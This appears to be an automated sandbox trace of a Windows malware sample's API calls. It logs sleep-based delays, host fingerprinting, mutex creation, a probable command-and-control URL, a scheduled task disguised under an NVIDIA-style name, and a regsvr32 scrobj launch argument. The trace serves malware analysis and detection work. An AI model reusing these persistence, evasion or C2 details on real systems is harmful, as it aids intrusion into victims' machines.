[0153.435] Sleep (dwMilliseconds=0xa) [0153.450] Sleep (dwMilliseconds=0xa) [0153.467] Sleep (dwMilliseconds=0xa) [0153.490] Sleep (dwMilliseconds=0xa) [0153.497] Sleep (dwMilliseconds=0xa) [0153.513] Sleep (dwMilliseconds=0xa) [0153.538] Sleep (dwMilliseconds=0xa) [0153.544] Sleep (dwMilliseconds=0xa) [0153.559] Sleep (dwMilliseconds=0xa) [0153.575] Sleep (dwMilliseconds=0xa) [0153.591] Sleep (dwMilliseconds=0xa) [0153.613] Sleep (dwMilliseconds=0xa) [0153.622] Sleep (dwMilliseconds=0xa) [0153.637] Sleep (dwMilliseconds=0xa) [0153.653] Sleep (dwMilliseconds=0xa) [0153.681] Sleep (dwMilliseconds=0xa) [0153.685] Sleep (dwMilliseconds=0xa) [0153.700] Sleep (dwMilliseconds=0xa) [0153.723] Sleep (dwMilliseconds=0xa) [0153.747] Sleep (dwMilliseconds=0xa) [0153.762] Sleep (dwMilliseconds=0xa) [0153.778] Sleep (dwMilliseconds=0xa) [0153.793] Sleep (dwMilliseconds=0xa) [0153.809] Sleep (dwMilliseconds=0xa) [0153.825] Sleep (dwMilliseconds=0xa) [0153.840] Sleep (dwMilliseconds=0xa) [0153.856] Sleep (dwMilliseconds=0xa) [0153.879] Sleep (dwMilliseconds=0xa) [0153.887] Sleep (dwMilliseconds=0xa) [0153.902] Sleep (dwMilliseconds=0xa) [0153.918] Sleep (dwMilliseconds=0xa) [0153.935] Sleep (dwMilliseconds=0xa) [0153.950] Sleep (dwMilliseconds=0xa) [0153.965] Sleep (dwMilliseconds=0xa) [0153.981] Sleep (dwMilliseconds=0xa) [0154.004] Sleep (dwMilliseconds=0xa) [0154.012] Sleep (dwMilliseconds=0xa) [0154.027] Sleep (dwMilliseconds=0xa) [0154.043] Sleep (dwMilliseconds=0xa) [0154.059] Sleep (dwMilliseconds=0xa) [0154.074] Sleep (dwMilliseconds=0xa) [0154.090] Sleep (dwMilliseconds=0xa) [0154.105] Sleep (dwMilliseconds=0xa) [0154.128] Sleep (dwMilliseconds=0xa) [0154.137] Sleep (dwMilliseconds=0xa) [0154.152] Sleep (dwMilliseconds=0xa) [0154.168] Sleep (dwMilliseconds=0xa) [0154.183] Sleep (dwMilliseconds=0xa) [0154.199] Sleep (dwMilliseconds=0xa) [0154.215] Sleep (dwMilliseconds=0xa) [0154.230] Sleep (dwMilliseconds=0xa) [0154.253] Sleep (dwMilliseconds=0xa) [0154.261] Sleep (dwMilliseconds=0xa) [0154.277] Sleep (dwMilliseconds=0xa) [0154.293] Sleep (dwMilliseconds=0xa) [0154.308] Sleep (dwMilliseconds=0xa) [0154.326] Sleep (dwMilliseconds=0xa) [0154.339] Sleep (dwMilliseconds=0xa) [0154.355] Sleep (dwMilliseconds=0xa) [0154.379] Sleep (dwMilliseconds=0xa) [0154.386] Sleep (dwMilliseconds=0xa) [0154.402] Sleep (dwMilliseconds=0xa) [0154.418] Sleep (dwMilliseconds=0xa) [0154.433] Sleep (dwMilliseconds=0xa) [0154.449] Sleep (dwMilliseconds=0xa) [0154.464] Sleep (dwMilliseconds=0xa) [0154.480] Sleep (dwMilliseconds=0xa) [0154.503] Sleep (dwMilliseconds=0xa) [0154.511] Sleep (dwMilliseconds=0xa) [0154.537] Sleep (dwMilliseconds=0xa) [0154.542] Sleep (dwMilliseconds=0xa) [0154.558] Sleep (dwMilliseconds=0xa) [0154.573] Sleep (dwMilliseconds=0xa) [0154.589] Sleep (dwMilliseconds=0xa) [0154.605] Sleep (dwMilliseconds=0xa) [0154.629] Sleep (dwMilliseconds=0xa) [0154.636] Sleep (dwMilliseconds=0xa) [0154.651] Sleep (dwMilliseconds=0xa) [0154.667] Sleep (dwMilliseconds=0xa) [0154.683] Sleep (dwMilliseconds=0xa) [0154.698] Sleep (dwMilliseconds=0xa) [0154.714] Sleep (dwMilliseconds=0xa) [0154.738] Sleep (dwMilliseconds=0xa) [0154.762] Sleep (dwMilliseconds=0xa) [0154.776] Sleep (dwMilliseconds=0xa) [0154.792] Sleep (dwMilliseconds=0xa) [0154.807] Sleep (dwMilliseconds=0xa) [0154.823] Sleep (dwMilliseconds=0xa) [0154.839] Sleep (dwMilliseconds=0xa) [0154.854] Sleep (dwMilliseconds=0xa) [0154.870] Sleep (dwMilliseconds=0xa) [0154.893] Sleep (dwMilliseconds=0xa) [0154.901] Sleep (dwMilliseconds=0xa) [0154.917] Sleep (dwMilliseconds=0xa) [0154.933] Sleep (dwMilliseconds=0xa) [0154.948] Sleep (dwMilliseconds=0xa) [0154.963] Sleep (dwMilliseconds=0xa) [0154.979] Sleep (dwMilliseconds=0xa) [0154.995] Sleep (dwMilliseconds=0xa) [0155.018] Sleep (dwMilliseconds=0xa) [0155.026] Sleep (dwMilliseconds=0xa) [0155.041] Sleep (dwMilliseconds=0xa) [0155.057] Sleep (dwMilliseconds=0xa) [0155.073] Sleep (dwMilliseconds=0xa) [0155.088] Sleep (dwMilliseconds=0xa) [0155.104] Sleep (dwMilliseconds=0xa) [0155.119] Sleep (dwMilliseconds=0xa) [0155.142] Sleep (dwMilliseconds=0xa) [0155.151] Sleep (dwMilliseconds=0xa) [0155.166] Sleep (dwMilliseconds=0xa) [0155.182] Sleep (dwMilliseconds=0xa) [0155.197] Sleep (dwMilliseconds=0xa) [0155.213] Sleep (dwMilliseconds=0xa) [0155.229] Sleep (dwMilliseconds=0xa) [0155.244] Sleep (dwMilliseconds=0xa) [0155.268] Sleep (dwMilliseconds=0xa) [0155.275] Sleep (dwMilliseconds=0xa) [0155.291] Sleep (dwMilliseconds=0xa) [0155.307] Sleep (dwMilliseconds=0xa) [0155.322] Sleep (dwMilliseconds=0xa) [0155.338] Sleep (dwMilliseconds=0xa) [0155.353] Sleep (dwMilliseconds=0xa) [0155.369] Sleep (dwMilliseconds=0xa) [0155.393] Sleep (dwMilliseconds=0xa) [0155.400] Sleep (dwMilliseconds=0xa) [0155.416] Sleep (dwMilliseconds=0xa) [0155.431] Sleep (dwMilliseconds=0xa) [0155.447] Sleep (dwMilliseconds=0xa) [0155.462] Sleep (dwMilliseconds=0xa) [0155.478] Sleep (dwMilliseconds=0xa) [0155.494] Sleep (dwMilliseconds=0xa) [0155.524] Sleep (dwMilliseconds=0xa) [0155.535] Sleep (dwMilliseconds=0xa) [0155.540] Sleep (dwMilliseconds=0xa) [0155.556] Sleep (dwMilliseconds=0xa) [0155.572] Sleep (dwMilliseconds=0xa) [0155.588] Sleep (dwMilliseconds=0xa) [0155.603] Sleep (dwMilliseconds=0xa) [0155.619] Sleep (dwMilliseconds=0xa) [0155.648] Sleep (dwMilliseconds=0xa) [0155.653] Sleep (dwMilliseconds=0xa) [0155.665] Sleep (dwMilliseconds=0xa) [0155.681] Sleep (dwMilliseconds=0xa) [0155.697] Sleep (dwMilliseconds=0xa) [0155.712] Sleep (dwMilliseconds=0xa) [0155.728] Sleep (dwMilliseconds=0xa) [0155.752] Sleep (dwMilliseconds=0xa) [0155.776] Sleep (dwMilliseconds=0xa) [0155.790] Sleep (dwMilliseconds=0xa) [0155.806] Sleep (dwMilliseconds=0xa) [0155.822] Sleep (dwMilliseconds=0xa) [0155.837] Sleep (dwMilliseconds=0xa) [0155.853] Sleep (dwMilliseconds=0xa) [0155.868] Sleep (dwMilliseconds=0xa) [0155.897] Sleep (dwMilliseconds=0xa) [0155.899] Sleep (dwMilliseconds=0xa) [0155.915] Sleep (dwMilliseconds=0xa) [0155.931] Sleep (dwMilliseconds=0xa) [0155.946] Sleep (dwMilliseconds=0xa) [0155.962] Sleep (dwMilliseconds=0xa) [0155.977] Sleep (dwMilliseconds=0xa) [0155.993] Sleep (dwMilliseconds=0xa) [0156.021] Sleep (dwMilliseconds=0xa) [0156.024] Sleep (dwMilliseconds=0xa) [0156.040] Sleep (dwMilliseconds=0xa) [0156.055] Sleep (dwMilliseconds=0xa) [0156.072] Sleep (dwMilliseconds=0xa) [0156.086] Sleep (dwMilliseconds=0xa) [0156.102] Sleep (dwMilliseconds=0xa) [0156.118] Sleep (dwMilliseconds=0xa) [0156.142] Sleep (dwMilliseconds=0xa) [0156.149] Sleep (dwMilliseconds=0xa) [0156.164] Sleep (dwMilliseconds=0xa) [0156.180] Sleep (dwMilliseconds=0xa) [0156.196] Sleep (dwMilliseconds=0xa) [0156.211] Sleep (dwMilliseconds=0xa) [0156.227] Sleep (dwMilliseconds=0xa) [0156.243] Sleep (dwMilliseconds=0xa) [0156.266] Sleep (dwMilliseconds=0xa) [0156.274] Sleep (dwMilliseconds=0xa) [0156.289] Sleep (dwMilliseconds=0xa) [0156.305] Sleep (dwMilliseconds=0xa) [0156.320] Sleep (dwMilliseconds=0xa) [0156.336] Sleep (dwMilliseconds=0xa) [0156.352] Sleep (dwMilliseconds=0xa) [0156.368] Sleep (dwMilliseconds=0xa) [0156.392] Sleep (dwMilliseconds=0xa) [0156.398] Sleep (dwMilliseconds=0xa) [0156.416] Sleep (dwMilliseconds=0xa) [0156.430] Sleep (dwMilliseconds=0xa) [0156.446] Sleep (dwMilliseconds=0xa) [0156.461] Sleep (dwMilliseconds=0xa) [0156.476] Sleep (dwMilliseconds=0xa) [0156.492] Sleep (dwMilliseconds=0xa) [0156.516] Sleep (dwMilliseconds=0xa) [0156.533] Sleep (dwMilliseconds=0xa) [0156.539] Sleep (dwMilliseconds=0xa) [0156.555] Sleep (dwMilliseconds=0xa) [0156.570] Sleep (dwMilliseconds=0xa) [0156.586] Sleep (dwMilliseconds=0xa) [0156.602] Sleep (dwMilliseconds=0xa) [0156.617] Sleep (dwMilliseconds=0xa) [0156.641] Sleep (dwMilliseconds=0xa) [0156.648] Sleep (dwMilliseconds=0xa) [0156.664] Sleep (dwMilliseconds=0xa) [0156.680] Sleep (dwMilliseconds=0xa) [0156.695] Sleep (dwMilliseconds=0xa) [0156.711] Sleep (dwMilliseconds=0xa) [0156.726] Sleep (dwMilliseconds=0xa) [0156.742] Sleep (dwMilliseconds=0xa) [0156.766] Sleep (dwMilliseconds=0xa) [0156.776] Sleep (dwMilliseconds=0xa) [0156.789] Sleep (dwMilliseconds=0xa) [0156.804] Sleep (dwMilliseconds=0xa) [0156.820] Sleep (dwMilliseconds=0xa) [0156.841] Sleep (dwMilliseconds=0xa) [0156.851] Sleep (dwMilliseconds=0xa) [0156.867] Sleep (dwMilliseconds=0xa) [0156.890] Sleep (dwMilliseconds=0xa) [0156.898] Sleep (dwMilliseconds=0xa) [0156.913] Sleep (dwMilliseconds=0xa) [0156.933] Sleep (dwMilliseconds=0xa) [0156.945] GetSystemDirectoryA (in: lpBuffer=0x746f8e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.945] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" [0156.945] RtlGetVersion (in: lpVersionInformation=0x54c0447 | out: lpVersionInformation=0x54c0447*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0156.945] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x746f8c8 | out: TokenHandle=0x746f8c8*=0x530) returned 1 [0156.945] GetTokenInformation (in: TokenHandle=0x530, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x746f8c0 | out: TokenInformation=0x0, ReturnLength=0x746f8c0) returned 0 [0156.945] GetProcessHeap () returned 0x210000 [0156.945] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x25) returned 0x46cfd40 [0156.945] GetTokenInformation (in: TokenHandle=0x530, TokenInformationClass=0x19, TokenInformation=0x46cfd40, TokenInformationLength=0x1c, ReturnLength=0x746f8c0 | out: TokenInformation=0x46cfd40, ReturnLength=0x746f8c0) returned 1 [0156.945] GetSidSubAuthorityCount (pSid=0x46cfd50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x46cfd51 [0156.945] GetSidSubAuthority (pSid=0x46cfd50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x46cfd58 [0156.945] GetProcessHeap () returned 0x210000 [0156.945] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46cfd40) returned 1 [0156.945] CloseHandle (hObject=0x530) returned 1 [0156.945] GetComputerNameA (in: lpBuffer=0x746f990, nSize=0x746f9c0 | out: lpBuffer="XDUWTFONO", nSize=0x746f9c0) returned 1 [0156.945] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x746f9d0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x746f9d0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.947] GetProcessHeap () returned 0x210000 [0156.947] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x29) returned 0x46cbca0 [0156.947] wsprintfA (in: param_1=0x46cbca0, param_2="%s%08X%08X" | out: param_1="XDUWTFONO0B0D4D069C354B42") returned 25 [0156.947] CryptAcquireContextA (in: phProv=0x746f908, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x746f908*=0x2e8cb0) returned 1 [0156.949] CryptCreateHash (in: hProv=0x2e8cb0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x746f900 | out: phHash=0x746f900) returned 1 [0156.949] lstrlenA (lpString="XDUWTFONO0B0D4D069C354B42") returned 25 [0156.949] CryptHashData (hHash=0x4683460, pbData=0x46cbca0, dwDataLen=0x19, dwFlags=0x0) returned 1 [0156.949] CryptGetHashParam (in: hHash=0x4683460, dwParam=0x2, pbData=0x746f910, pdwDataLen=0x746f940, dwFlags=0x0 | out: pbData=0x746f910, pdwDataLen=0x746f940) returned 1 [0156.949] wsprintfA (in: param_1=0x54c020c, param_2="%02X" | out: param_1="60") returned 2 [0156.949] wsprintfA (in: param_1=0x54c020e, param_2="%02X" | out: param_1="49") returned 2 [0156.949] wsprintfA (in: param_1=0x54c0210, param_2="%02X" | out: param_1="54") returned 2 [0156.949] wsprintfA (in: param_1=0x54c0212, param_2="%02X" | out: param_1="A4") returned 2 [0156.949] wsprintfA (in: param_1=0x54c0214, param_2="%02X" | out: param_1="50") returned 2 [0156.949] wsprintfA (in: param_1=0x54c0216, param_2="%02X" | out: param_1="75") returned 2 [0156.949] wsprintfA (in: param_1=0x54c0218, param_2="%02X" | out: param_1="2B") returned 2 [0156.949] wsprintfA (in: param_1=0x54c021a, param_2="%02X" | out: param_1="96") returned 2 [0156.949] wsprintfA (in: param_1=0x54c021c, param_2="%02X" | out: param_1="B7") returned 2 [0156.949] wsprintfA (in: param_1=0x54c021e, param_2="%02X" | out: param_1="2C") returned 2 [0156.950] wsprintfA (in: param_1=0x54c0220, param_2="%02X" | out: param_1="F2") returned 2 [0156.950] wsprintfA (in: param_1=0x54c0222, param_2="%02X" | out: param_1="C4") returned 2 [0156.950] wsprintfA (in: param_1=0x54c0224, param_2="%02X" | out: param_1="FA") returned 2 [0156.950] wsprintfA (in: param_1=0x54c0226, param_2="%02X" | out: param_1="84") returned 2 [0156.950] wsprintfA (in: param_1=0x54c0228, param_2="%02X" | out: param_1="48") returned 2 [0156.950] wsprintfA (in: param_1=0x54c022a, param_2="%02X" | out: param_1="6C") returned 2 [0156.950] CryptDestroyHash (hHash=0x4683460) returned 1 [0156.950] CryptReleaseContext (hProv=0x2e8cb0, dwFlags=0x0) returned 1 [0156.950] wsprintfA (in: param_1=0x54c022c, param_2="%08X" | out: param_1="9C354B42") returned 8 [0156.950] GetProcessHeap () returned 0x210000 [0156.950] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46cbca0) returned 1 [0156.950] wsprintfA (in: param_1=0x54c0dae, param_2="%s%s" | out: param_1="604954A450752B96B72CF2C4FA84486C9C354B42FF") returned 42 [0156.950] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="604954A450752B96B72CF2C4FA84486C9C354B42") returned 0x530 [0156.950] RtlGetLastWin32Error () returned 0x0 [0156.950] GetTickCount () returned 0x11603f7 [0156.950] GetProcessHeap () returned 0x210000 [0156.950] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1008) returned 0x46ae270 [0156.950] GetProcessHeap () returned 0x210000 [0156.950] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2e) returned 0x46cbca0 [0156.950] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x746f9d8 | out: phkResult=0x746f9d8*=0x51c) returned 0x0 [0156.950] GetProcessHeap () returned 0x210000 [0156.951] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x14) returned 0x46970b0 [0156.951] RegQueryValueExA (in: hKey=0x51c, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x746f960, lpcbData=0x746f9c0*=0x20 | out: lpType=0x0, lpData=0x746f960*=0x0, lpcbData=0x746f9c0*=0x20) returned 0x2 [0156.951] GetProcessHeap () returned 0x210000 [0156.951] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46970b0) returned 1 [0156.951] GetProcessHeap () returned 0x210000 [0156.951] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x11) returned 0x46970b0 [0156.951] RegQueryValueExA (in: hKey=0x51c, lpValueName="Version", lpReserved=0x0, lpType=0x0, lpData=0x746f960, lpcbData=0x746f9c0*=0x20 | out: lpType=0x0, lpData=0x746f960*=0x38, lpcbData=0x746f9c0*=0xf) returned 0x0 [0156.951] GetProcessHeap () returned 0x210000 [0156.951] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46970b0) returned 1 [0156.951] lstrlenA (lpString="8.0.7601.17514") returned 14 [0156.951] lstrlenA (lpString=".") returned 1 [0156.951] atoi (_Str="8") returned 8 [0156.951] RegCloseKey (hKey=0x51c) returned 0x0 [0156.951] GetProcessHeap () returned 0x210000 [0156.951] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46cbca0) returned 1 [0156.951] ObtainUserAgentString (in: dwOption=0x8, pszUAOut=0x46ae270, cbSize=0x746f9c0 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)", cbSize=0x746f9c0) returned 0x0 [0156.958] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned 195 [0156.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x46ae270, cbMultiByte=196, lpWideCharStr=0x54c0567, cchWideChar=392 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)") returned 196 [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46ae270) returned 1 [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1008) returned 0x46ae270 [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1c) returned 0x46cfd40 [0156.958] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x46ae270, nSize=0x105 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2e [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46cfd40) returned 1 [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x16) returned 0x46970b0 [0156.958] wsprintfW (in: param_1=0x54c0796, param_2="%s\\%hs" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned 53 [0156.958] wsprintfW (in: param_1=0x54c099e, param_2="%s\\%hs" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw") returned 53 [0156.958] wsprintfW (in: param_1=0x54c0ba6, param_2="%s\\%hs" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gaejfer") returned 53 [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x46970b0) returned 1 [0156.958] GetProcessHeap () returned 0x210000 [0156.958] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x44) returned 0x477b5e0 [0156.958] lstrlenA (lpString="http://hockeysministries.org/playoff/chmpion4378/hockey.php") returned 59 [0156.958] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x477b5e0, Length=0x3b) returned 0x477da475 [0156.959] GetProcessHeap () returned 0x210000 [0156.959] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x477b5e0) returned 1 [0156.959] lstrcmpW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned 0 [0156.959] GetProcessHeap () returned 0x210000 [0156.959] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0156.959] GetProcessHeap () returned 0x210000 [0156.959] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x72) returned 0x4639530 [0156.959] wsprintfW (in: param_1=0x2fc6f0, param_2="NvNgxUpdateCheckDaily_{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}") returned 60 [0156.959] GetProcessHeap () returned 0x210000 [0156.959] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x4639530) returned 1 [0156.959] CoCreateInstance (in: rclsid=0x5561010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x5561000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x746f818 | out: ppv=0x746f818*=0x32bef0) returned 0x0 [0156.960] TaskScheduler:ITaskService:Connect (This=0x32bef0, serverName=0x746f880*(varType=0x0, wReserved1=0x2f, wReserved2=0x0, wReserved3=0x0, varVal1=0x54c0000, varVal2=0x54c0000), user=0x746f8a0*(varType=0x0, wReserved1=0x2f, wReserved2=0x0, wReserved3=0x0, varVal1=0x54c0000, varVal2=0x54c0000), domain=0x746f860*(varType=0x0, wReserved1=0x2f, wReserved2=0x0, wReserved3=0x0, varVal1=0x54c0000, varVal2=0x54c0000), password=0x746f8e0*(varType=0x0, wReserved1=0x2f, wReserved2=0x0, wReserved3=0x0, varVal1=0x54c0000, varVal2=0x54c0000)) returned 0x0 [0156.962] TaskScheduler:ITaskService:GetFolder (in: This=0x32bef0, Path="", ppFolder=0x746f838 | out: ppFolder=0x746f838*=0x325510) returned 0x0 [0156.969] ITaskFolder:DeleteTask (This=0x325510, Name="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}", flags=0) returned 0x0 [0157.067] TaskScheduler:IUnknown:Release (This=0x325510) returned 0x0 [0157.067] TaskScheduler:IUnknown:Release (This=0x32bef0) returned 0x0 [0157.067] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jgshctw")) returned 1 [0157.069] GetProcessHeap () returned 0x210000 [0157.069] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fc6f0) returned 1 [0157.069] GetProcessHeap () returned 0x210000 [0157.069] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x4a) returned 0x46cda20 [0157.069] GetProcessHeap () returned 0x210000 [0157.069] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x418) returned 0x2c326e0 [0157.069] wsprintfW (in: param_1=0x2c326e0, param_2="/s /n /u /i:\"%s\" scrobj" | out: param_1="/s /n /u /i:\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw\" scrobj") returned 74 [0157.069] GetProcessHeap () returned 0x210000 [0157.069] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x212) returned 0x47615c0 [0157.069] GetUserNameW (in: lpBuffer=0x47615c0, pcbBuffer=0x746f970 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x746f970) returned 1 [0157.071] GetProcessHeap () returned 0x210000 [0157.071] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fc6f0 [0157.071] GetProcessHeap () returned 0x210000 [0157.071] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x72) returned 0x463a3b0 [0157.071] wsprintfW (in: param_1=0x2fc6f0, param_2="NvNgxUpdateCheckDaily_{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="NvNgxUpdateCheckDaily_{1D17D70A-D70A-D70A-D70A-1D17D70AD70A}") returned 60 [0157.071] GetProcessHeap () returned 0x210000 [0157.071] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x463a3b0) returned 1 [0157.071] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\jgshctw" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jgshctw"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x628 [0157.072] GetProcessHeap () returned 0x210000 [0157.073] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xf5) returned 0x2e8cb0 [0157.073] GetProcessHeap () returned 0x210000 [0157.073] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x10d) returned 0x2fdfb0 [0157.073] GetProcessHeap () returned 0x210000 [0157.073] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x210) returned 0x47617f0 [0157.073] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gtjtdfe" [0157.073] wsprintfA (in: param_1=0x2fdfb0, param_2="" | out: param_1="") returned 285 [0157.073] GetProcessHeap () returned 0x210000 [0157.073] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x47617f0) returned 1 [0157.073] GetProcessHeap () returned 0x210000 [0157.073] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2e8cb0) returned 1 [0157.073] WriteFile (in: hFile=0x628, lpBuffer=0x2fdfb0*, nNumberOfBytesToWrite=0x11d, lpNumberOfBytesWritten=0x746f928, lpOverlapped=0x0 | out: lpBuffer=0x2fdfb0*, lpNumberOfBytesWritten=0x746f928*=0x11d, lpOverlapped=0x0) returned 1 [0157.074] CloseHandle (hObject=0x628) returned 1 [0157.074] GetProcessHeap () returned 0x210000 [0157.074] RtlFreeHeap (HeapHandle=0x210000, Flags=0x0, BaseAddress=0x2fdfb0) returned 1 [0157.074] GetProcessHeap () returned 0x210000 [0157.074] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x16) returned 0x4697130 [0157.074] GetProcessHeap () returned 0x210000 [0157.074] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x210) returned 0x47617f0 